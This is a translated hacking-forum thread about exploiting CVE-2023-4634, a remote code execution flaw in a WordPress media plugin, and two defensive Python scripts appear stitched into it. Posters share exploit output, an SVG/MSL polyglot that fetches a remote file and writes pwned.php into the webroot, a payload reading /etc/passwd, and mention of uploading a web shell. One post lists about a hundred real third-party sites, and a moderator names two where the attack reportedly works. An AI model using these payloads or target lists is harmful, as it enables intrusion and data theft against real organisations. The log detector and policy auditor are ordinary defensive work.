Wordpress Plugin Media-Library Plugin | RCE | CVE-2023-4634

Discussion in 'Песочница' (Sandbox) started by marmalade_knight, 16 Sep 2023.

marmalade_knight (New Member):

PoC https://github.com/Patrowl/CVE-2023-4634
70,000+ active installations
WSO uploads just fine
     
b3 (Moderator):

That kindergarten stuff about WSO doesn't need to be written in; just the information about the exploit is enough.
x0xx (Banned):

Had to fight with the installation; the code depends on version 3.9+, otherwise it crashes with an error from grequests.
Besides that, pillow is missing. On deb:11 (python3.11*) I ran the install with this flag to get it installed correctly:
Code:
python3 -m pip install -r requirements.txt --break-system-packages
        
Explain the upload part:
Code:
[-] Checking arguments
   [-] All arguments for exploiting target are set, beginning the first checks
   [-] The remote FTP polyglot SVG/MSL file is reachable
   [-] The remote FTP polyglot SVG/MSL file ending with [0] is reachable
   [-] A sample remote FTP exploiter VID test file is reachable
   [-] A sample Remote FTP exploiter VID test file ending with [0] is reachable
   [-] The remote Exploit PNG/PHP file is reachable
[!] All arguments have been checked correctly, lauching exploitation
[-] Lauching 100 Threads on long SVG
[-] Waiting 5 second for the file to be created
[-] Starting Bruteforcing with VID exploiters
[-] Checking the drop of pwned.php
   [!] Not yet, try 1 on 9 ... checking again in 10 seconds
   [!] Not yet, try 2 on 9 ... checking again in 10 seconds
   [!] Not yet, try 3 on 9 ... checking again in 10 seconds
   [!] Not yet, try 4 on 9 ... checking again in 10 seconds
   [!] Not yet, try 5 on 9 ... checking again in 10 seconds
   [!] Not yet, try 6 on 9 ... checking again in 10 seconds
   [!] Not yet, try 7 on 9 ... checking again in 10 seconds
   [!] Not yet, try 8 on 9 ... checking again in 10 seconds
   [!] Not yet, try 9 on 9 ... checking again in 10 seconds
   [!] Exploit has not worked, try by increase concurrency value or use another method

        
Not enough rights on the root? Do we try the good old paths for --exploitname one/way/upload/pwned.php ?
UPD: no luck

Code:
grep exploitname CVE-2023-4634.py
        '--exploitname',
    exploitname = args.exploitname
        if not svg_polyglot_name or not svg_exploiter_names or not remotehttp or not png_polyglot_name or not webserverpath or not exploitname:
            print(colored("\t\t[x] The --svg_polyglot_name, --svg_exploiter_names, --remotehttp, --png_polyglot_name, --webserverpath and --exploitname options are needed to create the SVG/MSL Polyglot file", "red"))
    </image>""" % { "remotehttp": remotehttp +"/"+png_polyglot_name , "webserverpath" : webserverpath+"/"+exploitname }
    elif target and remoteftp and remotehttp and svg_polyglot_name and svg_exploiter_names and png_polyglot_name and exploitname:
        print(colored("[-] Checking the drop of "+exploitname, "cyan"))
        target_virus = target+"/"+exploitname

        
upd:
unclear, the path is hardcoded in poly.svg:

cat remote_ftp/poly.svg
Code:
<?xml version="1.0" encoding="UTF-8"?>
    <image>
    <read filename="http://123.123.123.123:80/virus.png" />
    <resize geometry="400x400" />
    <write filename="/var/www/html/pwned.php" />
    <get width="base-width" height="base-height" />
    <svg width="700" height="700" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
    <image xlink:href="http://192.192.192.23:1664/neverExist.svg" height="100" width="100"/>
    </svg>
        
Manually bringing up ftp with an open anonymous user and uploading 2 svgs (1.svg + 1.svg[0])
Code:
<svg width="500" height="500"
xmlns:xlink="http://www.w3.org/1999/xlink">
xmlns="http://www.w3.org/2000/svg">
<image xlink:href= "text:/etc/passwd" width="500" height="500" />
</svg>

When visiting:
Code:
http://site/wp-content/plugins/media-library-assistant/includes/mla-stream-image.php?mla_stream_file=ftp://X.X.X.X:2122/1.svg&mla_debug=log&mla_stream_height=500&mla_stream_width=600

It returns an image with no content, i.e. just a white background, no matter how you change *height + width.

Code:
--webserverpath WEBSERVERPATH
                        Path of the webserver on the victim server (could be found with the LFI and wp-config file) 
example: /var/www/html
https://github.com/Patrowl/CVE-2023-4634/issues/2

and it may not be found; needs testing on a local box. If anyone is actually using it or is going to test it, post back.

#3 x0xx, 27 Sep 2023
Last edited: 27 Sep 2023
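From the defender's side, the request shape shown in the post above (mla-stream-image.php called with an ftp:// value in mla_stream_file, plus mla_debug) is easy to pick out of a web server access log. The following is an added example, not code from the thread or from the Patrowl PoC: it parses combined-format log lines, flags any mla-stream-image.php request whose mla_stream_file is a URL, escapes the uploads directory or is double-encoded, and flags mla_debug on a public request. The sample log lines, the IPs and the UPLOADS_PREFIX path are constructed assumptions; adjust the prefix to the actual site layout.

```python
from __future__ import annotations

import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (combined log format). IPs and timestamps are made up;
# the request shapes mirror the mla-stream-image.php calls discussed in the thread.
SAMPLE_LOG = """\
203.0.113.10 - - [27/Sep/2023:10:15:01 +0000] "GET /wp-content/plugins/media-library-assistant/includes/mla-stream-image.php?mla_stream_file=%2Fvar%2Fwww%2Fhtml%2Fwp-content%2Fuploads%2F2023%2F09%2Fbrochure.pdf&mla_stream_width=150 HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
198.51.100.7 - - [27/Sep/2023:10:16:44 +0000] "GET /wp-content/plugins/media-library-assistant/includes/mla-stream-image.php?mla_stream_file=ftp%3A%2F%2F192.0.2.5%3A2122%2F1.svg&mla_debug=log&mla_stream_height=500&mla_stream_width=600 HTTP/1.1" 200 512 "-" "python-requests/2.31"
198.51.100.7 - - [27/Sep/2023:10:16:45 +0000] "GET /wp-content/plugins/media-library-assistant/includes/mla-stream-image.php?mla_stream_file=ftp%3A%2F%2F192.0.2.5%3A2122%2F1.svg%5B0%5D&mla_stream_width=600 HTTP/1.1" 200 512 "-" "python-requests/2.31"
203.0.113.22 - - [27/Sep/2023:10:17:02 +0000] "GET /wp-content/plugins/media-library-assistant/readme.txt HTTP/1.1" 200 40211 "-" "curl/8.2"
203.0.113.22 - - [27/Sep/2023:10:17:30 +0000] "GET /index.php HTTP/1.1" 200 30000 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
STREAM_ENDPOINT = "/mla-stream-image.php"
# Assumed local layout: legitimate streams come from the WordPress uploads directory.
UPLOADS_PREFIX = "/var/www/html/wp-content/uploads/"


def analyze_request(target: str, uploads_prefix: str = UPLOADS_PREFIX) -> list[str]:
    """Return reasons a request to mla-stream-image.php is suspicious; empty for benign or unrelated requests."""
    parts = urlsplit(target)
    if not parts.path.endswith(STREAM_ENDPOINT):
        return []
    params = parse_qs(parts.query, keep_blank_values=True)
    reasons: list[str] = []
    for raw in params.get("mla_stream_file", []):
        value = unquote(raw)  # parse_qs decoded once; a second pass unmasks double encoding
        if "://" in value:
            reasons.append(f"mla_stream_file is a URL (remote fetch): {value}")
        elif ".." in value or not value.startswith(uploads_prefix):
            reasons.append(f"mla_stream_file outside the uploads directory: {value}")
    if "mla_debug" in params:
        reasons.append("mla_debug set on a public request (debug output rendered into the image)")
    return reasons


def scan_log(text: str) -> list[dict]:
    """Run analyze_request over every line and collect the hits with source IP, timestamp and status."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a recognisable access-log line
        reasons = analyze_request(m["target"])
        if reasons:
            findings.append({"ip": m["ip"], "ts": m["ts"], "status": int(m["status"]), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} HTTP {hit['status']}")
        for r in hit["reasons"]:
            print("   -", r)
```

A 200 on a flagged request is the case worth following up: it means the plugin handed the value to its image pipeline. The readme.txt fetch in the sample is not flagged here; on its own it is only a version lookup, but it is cheap to add as a second, lower-severity rule.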
b3 (Moderator):

Did a bit of testing on a local box this evening, got strange results, will continue tomorrow. NO CLUE, in a word: there is a connection to the FTP, but GS complains in the logs. Either a specific SVG is needed or the right policy for imagemagick; I haven't fully figured it out myself yet. The default Debian 12 config didn't get through. On a couple of real targets the svg worked, but only the drawing part; reading text via text:/etc/passwd didn't work.
If anyone wants to join our merry hacker get-togethers, write.
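The remark above about "the right policy for imagemagick" is the lever an administrator actually controls: ImageMagick's policy.xml decides whether the MSL script, the text: pseudo-format and the remote URL/FTP/HTTP fetches used in this chain are allowed at all. The script below is an added example, not from the thread or the PoC. It parses a policy file, expands ImageMagick's brace-list patterns, and reports which of a required set of denies is missing; the two embedded policy fragments are constructed, and the REQUIRED_DENIES set is an editorial choice rather than anything the thread prescribes.

```python
import re
import xml.etree.ElementTree as ET

# Constructed policy fragments (no DOCTYPE, to keep them short). The weak one only blocks the
# Ghostscript-backed formats; the hardened one also blocks the coders this chain depends on.
WEAK_POLICY = """<policymap>
  <policy domain="coder" rights="none" pattern="{PS,PS2,PS3,EPS,PDF,XPS}" />
</policymap>
"""

HARDENED_POLICY = """<policymap>
  <policy domain="coder" rights="none" pattern="{PS,PS2,PS3,EPS,PDF,XPS}" />
  <policy domain="coder" rights="none" pattern="MSL" />
  <policy domain="coder" rights="none" pattern="TEXT" />
  <policy domain="coder" rights="none" pattern="{URL,FTP,HTTP,HTTPS}" />
  <policy domain="path" rights="none" pattern="@*" />
</policymap>
"""

# Editorial choice of what must be denied: MSL (the polyglot's read/write script), TEXT (the
# text: pseudo-format that renders a file into an image), the remote-fetch coders, and the
# "@*" path rule that blocks indirect reads of the form @/some/file.
REQUIRED_DENIES = {
    "coder": {"MSL", "TEXT", "URL", "FTP", "HTTP", "HTTPS"},
    "path": {"@*"},
}


def expand_pattern(pattern: str) -> set:
    """ImageMagick allows a brace list in one rule: '{PS,EPS}' -> {'PS', 'EPS'}."""
    m = re.fullmatch(r"\{(.*)\}", pattern.strip())
    names = m.group(1).split(",") if m else [pattern]
    return {n.strip().upper() for n in names if n.strip()}


def denied_patterns(policy_xml: str) -> dict:
    """Map each policy domain to the set of patterns it denies (rights="none")."""
    denied: dict = {}
    for pol in ET.fromstring(policy_xml).iter("policy"):
        if pol.get("rights", "").strip().lower() != "none":
            continue
        domain = pol.get("domain", "").strip().lower()
        if domain == "module":  # ImageMagick 7 can gate the same coders via the module domain
            domain = "coder"
        pattern = pol.get("pattern", "").strip()
        names = expand_pattern(pattern) if domain == "coder" else {pattern}
        denied.setdefault(domain, set()).update(names)
    return denied


def missing_denies(policy_xml: str) -> dict:
    """Return {domain: set of required patterns not denied}; an empty dict means the policy passes."""
    denied = denied_patterns(policy_xml)
    missing = {}
    for domain, wanted in REQUIRED_DENIES.items():
        have = denied.get(domain, set())
        if "*" in have:  # a catch-all deny covers everything in that domain
            continue
        gap = wanted - have
        if gap:
            missing[domain] = gap
    return missing


if __name__ == "__main__":
    for label, xml in (("weak", WEAK_POLICY), ("hardened", HARDENED_POLICY)):
        print(label, "->", missing_denies(xml) or "OK")
```

To audit a real host, read the installed policy file (on Debian-based systems it typically lives under /etc/ImageMagick-6/ or /etc/ImageMagick-7/) and pass its text to missing_denies; `convert -list policy` prints the policy ImageMagick actually loaded, which is the one to trust when several copies exist. The check is a whitelist of denies, so a policy that disables a coder by another mechanism (for example by removing the delegate) will still show up as a gap and needs a manual look.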
x0xx (Banned):

Drawing the file contents over the image using mla_debug, aka LFI.

Code:
...you can try adding mla_debug=true ... this will display a lot of ugly debug information on the screen...

As I understand it, the "ugly information" over the image is, in our case, exactly /etc/passwd being rendered.
The example looks wrong at first glance:
Code:
<svg width="500" height="500"
xmlns:xlink="http://www.w3.org/1999/xlink">
xmlns="http://www.w3.org/2000/svg">
<image xlink:href= "text:/etc/passwd" width="500" height="500" />
</svg>

But it is precisely the error that makes it possible to output the data with mla_debug=true; what remains unclear to me is which dependencies need to be taken into account.
A very finicky bug.
Feature: wp-content/plugins/media-library-assistant/readme.txt lets you find out the plugin version.
So far I have tested the log output on:
Code:
= 3.06 =
= 2.79 =
= 3.04 =

#5 x0xx, 29 Sep 2023
Last edited: 29 Sep 2023
b3 (Moderator):

Well, reading files we've figured out; it works. There are a couple of quirks, but it works. But we haven't seen RCE on targets yet.
At the moment it isn't even clear why the reader works on some targets and not on others. We set up a local box, all the conditions seem to be met, but the "reader" didn't fire. Possibly the IM or GS version plays a role.

#6 b3, 30 Sep 2023
Last edited: 30 Sep 2023
edos (Member):

A hundred resources with various versions; many have already updated since my last scan. I myself got nothing out of this CVE.

                Code:
                http://theblemish.com/wp-content/plugins/media-library-assistant/readme.txt
                http://funnymedianews.com/wp-content/plugins/media-library-assistant/readme.txt
                http://bonehealthandosteoporosis.org/wp-content/plugins/media-library-assistant/readme.txt
                http://tabacshop.ch/wp-content/plugins/media-library-assistant/readme.txt
                http://nmuofficial.com/wp-content/plugins/media-library-assistant/readme.txt
                http://sirabee.com/wp-content/plugins/media-library-assistant/readme.txt
                http://hometownhealthcenter.org/wp-content/plugins/media-library-assistant/readme.txt
                http://aqleeat.com/wp-content/plugins/media-library-assistant/readme.txt
                http://talkingpointsmemo.com/wp-content/plugins/media-library-assistant/readme.txt
                http://weltwoche.de/wp-content/plugins/media-library-assistant/readme.txt
                http://perishablenews.com/wp-content/plugins/media-library-assistant/readme.txt
                http://cbm.ch/wp-content/plugins/media-library-assistant/readme.txt
                http://desafio21diassemcarne.com.br/wp-content/plugins/media-library-assistant/readme.txt
                http://themagicforless.com/wp-content/plugins/media-library-assistant/readme.txt
                http://catholicnews.com/wp-content/plugins/media-library-assistant/readme.txt
                http://elberadweg.de/wp-content/plugins/media-library-assistant/readme.txt
                http://aryan-solutions.com/wp-content/plugins/media-library-assistant/readme.txt
                http://lightnovelstranslations.com/wp-content/plugins/media-library-assistant/readme.txt
                http://ame-name.com/wp-content/plugins/media-library-assistant/readme.txt
                http://arpc.gov.au/wp-content/plugins/media-library-assistant/readme.txt
                http://brainright.com/wp-content/plugins/media-library-assistant/readme.txt
                http://figment.live/wp-content/plugins/media-library-assistant/readme.txt
                http://fpta.pt/wp-content/plugins/media-library-assistant/readme.txt
                http://tm-consulting.ru/wp-content/plugins/media-library-assistant/readme.txt
                http://maxlucado.com/wp-content/plugins/media-library-assistant/readme.txt
                http://plumamazing.com/wp-content/plugins/media-library-assistant/readme.txt
                http://trolleymuseum.org/wp-content/plugins/media-library-assistant/readme.txt
                http://grapplersguide.com/wp-content/plugins/media-library-assistant/readme.txt
                http://inventorysource.com/wp-content/plugins/media-library-assistant/readme.txt
                http://disneynews.us/wp-content/plugins/media-library-assistant/readme.txt
                http://militaryscalemodelling.com/wp-content/plugins/media-library-assistant/readme.txt
                http://infonomics-society.org/wp-content/plugins/media-library-assistant/readme.txt
                http://croci.net/wp-content/plugins/media-library-assistant/readme.txt
                http://unexmin.eu/wp-content/plugins/media-library-assistant/readme.txt
                http://historicjamestowne.org/wp-content/plugins/media-library-assistant/readme.txt
                http://sis.us/wp-content/plugins/media-library-assistant/readme.txt
                http://shambhala.org/wp-content/plugins/media-library-assistant/readme.txt
                http://localpedia.de/wp-content/plugins/media-library-assistant/readme.txt
                http://phantis.com/wp-content/plugins/media-library-assistant/readme.txt
                http://vintagelittlelady.com/wp-content/plugins/media-library-assistant/readme.txt
                http://uka.org.uk/wp-content/plugins/media-library-assistant/readme.txt
                http://thfoods.com/wp-content/plugins/media-library-assistant/readme.txt
                http://flingtrainer.com/wp-content/plugins/media-library-assistant/readme.txt
                http://trulucks.com/wp-content/plugins/media-library-assistant/readme.txt
                http://cvsu.edu.ph/wp-content/plugins/media-library-assistant/readme.txt
                http://globalrallycross.com/wp-content/plugins/media-library-assistant/readme.txt
                http://polkadotwedding.com/wp-content/plugins/media-library-assistant/readme.txt
                http://yosmart.com/wp-content/plugins/media-library-assistant/readme.txt
                http://tretavazrast.com/wp-content/plugins/media-library-assistant/readme.txt
                http://alumni.ucd.ie/wp-content/plugins/media-library-assistant/readme.txt
                http://research.lifeway.com/wp-content/plugins/media-library-assistant/readme.txt
                http://ack.ug.edu.pl/wp-content/plugins/media-library-assistant/readme.txt
                http://library.mwit.ac.th/wp-content/plugins/media-library-assistant/readme.txt
                http://shop.dtwrestling.com/wp-content/plugins/media-library-assistant/readme.txt
                http://zip-tokens.com.customers.tigertech.net/wp-content/plugins/media-library-assistant/readme.txt
                http://elrecanv.vh122.hosterby.com/wp-content/plugins/media-library-assistant/readme.txt
                http://hotel.rosenthal.de/wp-content/plugins/media-library-assistant/readme.txt
                http://alumni.pensacolastate.edu/wp-content/plugins/media-library-assistant/readme.txt
                http://studio.balfour.com/wp-content/plugins/media-library-assistant/readme.txt
                http://studio-rc.balfour.com/wp-content/plugins/media-library-assistant/readme.txt
                http://studio-stage.balfour.com/wp-content/plugins/media-library-assistant/readme.txt
                http://brandstore.wabco-auto.com/wp-content/plugins/media-library-assistant/readme.txt
                http://shop.transition-news.org/wp-content/plugins/media-library-assistant/readme.txt
                http://web.csg.org/wp-content/plugins/media-library-assistant/readme.txt
                http://shop.glciran.com/wp-content/plugins/media-library-assistant/readme.txt
                http://th.kumonglobal.com/wp-content/plugins/media-library-assistant/readme.txt
                http://hrc.sfasu.edu/wp-content/plugins/media-library-assistant/readme.txt
                http://m5.moonideas.com/wp-content/plugins/media-library-assistant/readme.txt
                http://shop.nwfa.org/wp-content/plugins/media-library-assistant/readme.txt
                http://elementor.inmak.net/wp-content/plugins/media-library-assistant/readme.txt
                http://is.fourfaith.com/wp-content/plugins/media-library-assistant/readme.txt
                http://buk.um.ac.id/wp-content/plugins/media-library-assistant/readme.txt
                http://library.addu.edu.ph/wp-content/plugins/media-library-assistant/readme.txt
                http://treasure.ready.jp/wp-content/plugins/media-library-assistant/readme.txt
                http://centralny.heart.org/wp-content/plugins/media-library-assistant/readme.txt
                http://bostoncig.heart.org/wp-content/plugins/media-library-assistant/readme.txt
                http://newhampshire.heart.org/wp-content/plugins/media-library-assistant/readme.txt
                http://capitalregionny.heart.org/wp-content/plugins/media-library-assistant/readme.txt
                http://vermont.heart.org/wp-content/plugins/media-library-assistant/readme.txt
                http://missionlifelineia.heart.org/wp-content/plugins/media-library-assistant/readme.txt
                http://connecticut.heart.org/wp-content/plugins/media-library-assistant/readme.txt
                http://southernnewengland.heart.org/wp-content/plugins/media-library-assistant/readme.txt
                http://newjersey.heart.org/wp-content/plugins/media-library-assistant/readme.txt
                http://westernny.heart.org/wp-content/plugins/media-library-assistant/readme.txt
                http://cprblog.heart.org/wp-content/plugins/media-library-assistant/readme.txt
                http://hudsonvalleyny.heart.org/wp-content/plugins/media-library-assistant/readme.txt
                http://rochester.heart.org/wp-content/plugins/media-library-assistant/readme.txt
                http://massachusetts.heart.org/wp-content/plugins/media-library-assistant/readme.txt
                http://longisland.heart.org/wp-content/plugins/media-library-assistant/readme.txt
                http://heartofuticagrants.heart.org/wp-content/plugins/media-library-assistant/readme.txt
                http://nyc.heart.org/wp-content/plugins/media-library-assistant/readme.txt
                http://maine.heart.org/wp-content/plugins/media-library-assistant/readme.txt
                http://midatlantic.heart.org/wp-content/plugins/media-library-assistant/readme.txt
                http://applicants.mta.ac.il/wp-content/plugins/media-library-assistant/readme.txt
                http://33213.dcpserver.de/wp-content/plugins/media-library-assistant/readme.txt
                http://library.joshibi.ac.jp/wp-content/plugins/media-library-assistant/readme.txt
                http://clubcurator.golftec.com/wp-content/plugins/media-library-assistant/readme.txt
                http://byrne.pinelandsalliance.org/wp-content/plugins/media-library-assistant/readme.txt
                http://teacherpress.ocps.net/wp-content/plugins/media-library-assistant/readme.txt
                http://hrlms.ipro.org/wp-content/plugins/media-library-assistant/readme.txt
                http://nyushi.otaru-uc.ac.jp/wp-content/plugins/media-library-assistant/readme.txt
                http://netmedia.kanto-gakuin.ac.jp/wp-content/plugins/media-library-assistant/readme.txt
                http://nasukashi.niye.go.jp/wp-content/plugins/media-library-assistant/readme.txt
                 
b3 (Moderator):

for RCE you need the path

it works here, checked quickly, finish it off)
                  Code:
                  midatlantic.heart.org
                  clubcurator.golftec.com
                   